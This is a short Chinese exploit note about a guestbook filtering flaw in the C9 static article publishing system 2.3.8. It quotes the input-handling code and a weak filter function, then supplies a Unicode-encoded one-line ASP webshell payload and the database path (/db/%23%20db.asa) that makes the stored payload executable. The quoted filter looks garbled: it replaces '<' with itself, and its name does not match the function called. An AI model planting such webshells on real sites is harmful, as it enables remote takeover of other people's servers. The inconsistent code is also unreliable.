C9静态文章发布系统 2.3.8 版 留言本过滤不严导致插入一句话
代码:
names=funstrs(request.Form("names"))
code=funstrs(request.Form("mg"))
title=funstrs(request.Form("title"))
checkcode=funstrs(request.Form("checkcode"))
可以看到,留言内容经过funstrs函数的过滤,再看看funstrs函数是怎么写的,
Function funstr(str)
str = trim(str)
str = replace(str, "<", "<", 1, -1, 1)
str = replace(str, ">", ">", 1, -1, 1)
str = replace(str,"'","‘")
funstr = str
End Function
简单的过滤了<,>,',等内容,我们可以将一句话经过Unicode加密,┼攠數畣整爠煥敵瑳∨≡┩愾 插入数据库,数据库地址为/db/%23%20db.asa
